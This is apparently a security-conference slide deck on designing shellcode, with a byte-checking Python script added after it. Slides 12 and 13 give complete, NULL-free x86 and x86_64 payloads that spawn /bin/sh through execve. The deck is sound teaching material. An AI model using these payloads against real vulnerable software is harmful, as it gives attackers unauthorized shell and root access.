
Design and Implementation of Shellcodes.

How shellcodes are working and how they are created.

  1. Design and Implementation of Shellcodes. Amr Ali, Cairo Security Camp 2010
  2. What is a shellcode?
     • It's bytecode
     • Machine language
     • Compiled assembly source file
     • A string of mostly unprintable characters
     • Opcodes that the processor executes directly
     • Mostly doesn't contain NULL bytes
     • It is position independent
  3. Types of Shellcodes
     • Local shellcode
     • Remote shellcode
     • Download and execute shellcode
     • Egg-hunt shellcode
     • Omelet shellcode
  4. Local shellcode (diagram: on a system with normal user privileges, the shellcode runs inside a vulnerable root process, which yields a system with root privileges)
  5. Remote shellcode (diagram: the shellcode reaches a vulnerable remote service over the network, which yields a system with root privileges)
  6. Download and execute shellcode (diagram: the shellcode reaches a vulnerable anything over any medium; the system downloads a payload from the Internet and runs it)
  7. Egg-hunt shellcode (diagram: inside the vulnerable process, the egg-hunt shellcode searches for the shellcode, which sits at an unpredictable location)
  8. Omelet .....?
  9. Omelet shellcode (diagram: the egg-hunt shellcode locates the shellcode chunks scattered through the vulnerable process and combines them into the shellcode)
  10. x86 and Linux kernel ABI
      EAX : Holds the system call number.
      EBX : Contains the value or address of the 1st argument to the system call.
      ECX : Contains the value or address of the 2nd argument to the system call.
      EDX : Contains the value or address of the 3rd argument to the system call.
      EDI : General purpose register.
      ESI : General purpose register.
      EBP : Base Pointer register.
      ESP : Stack Pointer register.
      EIP : Instruction Pointer register.
  11. x86_64 and Linux kernel ABI
      RAX : Contains the system call number.
      RBX : General purpose register.
      RCX : General purpose register.
      RDX : The 3rd argument for the system call.
      RDI : The 1st argument for the system call.
      RSI : The 2nd argument for the system call.
      RBP : Base Pointer register.
      RSP : Stack Pointer register.
      RIP : Instruction Pointer register.
      R8 : The 4th argument for the system call.
      R9 : The 5th argument for the system call.
      R10 : The 6th argument for the system call.
      R11 – R15 : General purpose registers.
  12. x86 shellcode
      .global _start
      _start:
          cltd                  # 0x99
          push %edx             # 0x52
          push $0x68732f2f      # 0x68 0x2f 0x2f 0x73 0x68
          push $0x6e69622f      # 0x68 0x2f 0x62 0x69 0x6e
          movl %esp, %ebx       # 0x89 0xe3
          push %edx             # 0x52
          push %ebx             # 0x53
          push %esp             # 0x54
          pop %edx              # 0x5a
          movb $0x0b, %al       # 0xb0 0x0b
          int $0x80             # 0xcd 0x80
  13. x86_64 shellcode
      .global _start
      _start:
          cltd                              # 0x99
          push %rdx                         # 0x52
          movq $0x68732f6e69622f2f, %rbx    # 0x48 0xbb 0x2f 0x2f 0x62 0x69 0x6e 0x2f 0x73 0x68
          push %rbx                         # 0x53
          movq %rsp, %rdi                   # 0x48 0x89 0xe7
          push %rdx                         # 0x52
          push %rdi                         # 0x57
          movq %rsp, %rsi                   # 0x48 0x89 0xe6
          push $0x3b                        # 0x6a 0x3b
          pop %rax                          # 0x58
          syscall                           # 0x0f 0x05
  14. Information
      • Smashing the Stack for Fun and Profit by Aleph1: http://www.phrack.org/issues.html?issue=49&id=14
      • Shellcode: the assembly cocktail by Samy Bahra: http://www.infosecwriters.com/hhworld/shellcode.txt
      • The Shellcoder's Handbook
  15. Thanks. Questions? All presented material today will be available on my website. http://amr-ali.co.cc
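The two listings on slides 12 and 13 annotate every instruction with its encoded bytes, and slide 2 lists the properties those bytes are expected to have (no NULL bytes, mostly unprintable, a fixed-up string on the stack). The following analysis script is an added example, not part of the presentation: it takes the byte comments exactly as the slides give them, checks the slide 2 properties, and decodes the wide immediates to show which string each payload builds on the stack for the execve call (system call 11 on i386, 59 on x86_64). It only inspects the bytes; nothing is executed. The listing strings are copied from the slides; the helper names are my own.

```python
import re

# Constructed input: the annotated listings from slides 12 and 13, one
# instruction per line as "mnemonic operands   # 0x.. 0x..". The hex comments
# are the encoded bytes the slides give for each instruction.
#
# Note on the first two instructions of each listing: cltd sign-extends
# EAX/RAX into EDX/RDX, so the "push %edx" / "push %rdx" that follows pushes a
# zero (the NULL terminator and the empty envp/argv entries) only when the
# accumulator is non-negative on entry.
X86_LISTING = """\
cltd                   # 0x99
push %edx              # 0x52
push $0x68732f2f       # 0x68 0x2f 0x2f 0x73 0x68
push $0x6e69622f       # 0x68 0x2f 0x62 0x69 0x6e
movl %esp, %ebx        # 0x89 0xe3
push %edx              # 0x52
push %ebx              # 0x53
push %esp              # 0x54
pop %edx               # 0x5a
movb $0x0b, %al        # 0xb0 0x0b
int $0x80              # 0xcd 0x80
"""

X86_64_LISTING = """\
cltd                              # 0x99
push %rdx                         # 0x52
movq $0x68732f6e69622f2f, %rbx    # 0x48 0xbb 0x2f 0x2f 0x62 0x69 0x6e 0x2f 0x73 0x68
push %rbx                         # 0x53
movq %rsp, %rdi                   # 0x48 0x89 0xe7
push %rdx                         # 0x52
push %rdi                         # 0x57
movq %rsp, %rsi                   # 0x48 0x89 0xe6
push $0x3b                        # 0x6a 0x3b
pop %rax                          # 0x58
syscall                           # 0x0f 0x05
"""


def listing_to_bytes(listing: str) -> bytes:
    """Collect the byte values from the '# 0x..' comments, in listing order."""
    out = bytearray()
    for line in listing.splitlines():
        _, sep, comment = line.partition("#")
        if sep:
            out.extend(int(tok, 16) for tok in comment.split())
    return bytes(out)


def byte_properties(code: bytes) -> dict:
    """Check the properties slide 2 lists: total length, presence of NULL
    bytes, and how many bytes fall outside printable ASCII (0x20..0x7e)."""
    unprintable = sum(1 for b in code if not 0x20 <= b <= 0x7e)
    return {"length": len(code), "has_null": 0 in code, "unprintable": unprintable}


def stack_string(listing: str, width: int) -> str:
    """Rebuild the string that the wide immediates leave on the stack.
    Immediates are stored little-endian, and each later push lands at a lower
    address, so the in-memory image is the immediates in reverse order.
    One-byte immediates (the system call numbers) are skipped."""
    imms = [int(m, 16) for m in re.findall(r"\$0x([0-9a-f]+)", listing)]
    wide = [v for v in imms if v > 0xFF]
    image = b"".join(v.to_bytes(width, "little") for v in reversed(wide))
    return image.decode("ascii")


def summarize(listing: str, width: int) -> dict:
    """Combine the checks for one listing; width is the register size in bytes."""
    code = listing_to_bytes(listing)
    props = byte_properties(code)
    props["hex"] = code.hex()
    props["stack_string"] = stack_string(listing, width)
    return props


if __name__ == "__main__":
    for name, listing, width in (("x86", X86_LISTING, 4), ("x86_64", X86_64_LISTING, 8)):
        print(name, summarize(listing, width))
```

Running the script reports 22 bytes for the x86 listing and 26 for the x86_64 one, no NULL byte in either, and the stack strings "/bin//sh" and "//bin/sh": the doubled slash pads the path to a whole register width without introducing a zero byte, which is the trick the `push $0x68732f2f` / `movq $0x68732f6e69622f2f` immediates rely on.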